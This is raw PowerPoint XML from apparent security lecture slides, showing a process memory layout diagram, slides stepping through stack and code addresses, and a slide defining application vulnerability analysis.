          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985098" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5813970" y="3290461"/>
            <a:ext cx="3175" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985099" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5095324" y="5724937"/>
            <a:ext cx="2278188" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Bottom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0x00800000)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985100" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5103181" y="2063920"/>
            <a:ext cx="2134495" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0xBFFFFFFF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985101" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4342640"/>
            <a:ext cx="2590800" cy="181071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985102" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4523711"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6B9B8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985103" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010402" y="4430232"/>
            <a:ext cx="3175" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985104" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2317835"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Env/Argv Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985105" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2603584"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Env/Argv Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985106" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2889335"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985107" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4923761"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Data (.bss)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985108" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3919537"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211511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50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50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850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8510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8509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8509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8509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8510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8510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8510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85091">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85091">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85091">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8509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8509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8509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985091">
                                            <p:txEl>
                                              <p:pRg st="6" end="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985091">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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8510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85091">
                                            <p:txEl>
                                              <p:pRg st="8" end="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985091">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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98510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98510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98510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985091">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>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985107"/>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985093"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>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985091">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>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985091">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>
                                            </p:txEl>
                                          </p:spTgt>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9850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5092" grpId="0" animBg="1"/>
      <p:bldP spid="985093" grpId="0" animBg="1"/>
      <p:bldP spid="985094" grpId="0" animBg="1"/>
      <p:bldP spid="985095" grpId="0" animBg="1"/>
      <p:bldP spid="985096" grpId="0" animBg="1"/>
      <p:bldP spid="985097" grpId="0" animBg="1"/>
      <p:bldP spid="985098" grpId="0" animBg="1"/>
      <p:bldP spid="985099" grpId="0"/>
      <p:bldP spid="985100" grpId="0"/>
      <p:bldP spid="985101" grpId="0" animBg="1"/>
      <p:bldP spid="985102" grpId="0" animBg="1"/>
      <p:bldP spid="985103" grpId="0" animBg="1"/>
      <p:bldP spid="985104" grpId="0" animBg="1"/>
      <p:bldP spid="985105" grpId="0" animBg="1"/>
      <p:bldP spid="985106" grpId="0" animBg="1"/>
      <p:bldP spid="985107" grpId="0" animBg="1"/>
      <p:bldP spid="985108" grpId="0" animBg="1"/>
    </p:bld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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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390</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="503459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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1854425602"/>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0xbffff63c</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177792"/>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433978070"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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391</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1943634253"/>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0xbffff640</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0x0806e91b</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42271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900923903"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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392</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1961358401"/>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0xbffff644</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182833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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="427282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287135654"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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393</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1303600614"/>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0xbffff644</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0x080541b2</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209080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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="427282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502732753"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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394</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2051089855"/>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0xbffff648</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125902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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="391886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914275"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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395</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1572981825"/>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0xbffff648</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0x0809a67f</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1502002"/>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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="391886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83783607"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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396</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="869306143"/>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0xbffff64c</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0x080481c9</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236724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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="355507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894110174"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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397</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1869019861"/>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0xbffff650</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0x080481ca</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258401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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="318144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400950836"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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398</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28876174"/>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0xbffff654</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0x080e4bd1</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291034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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="283731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745380963"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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399</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1474785067"/>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0xbffff658</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0x080e4bd2</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313850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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="244402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349886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Application Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application vulnerability analysis is the process of identifying vulnerabilities in applications, as deployed in a specific operational environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142203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50" name="Rectangle 2"/>
          <p:cNvSpPr>
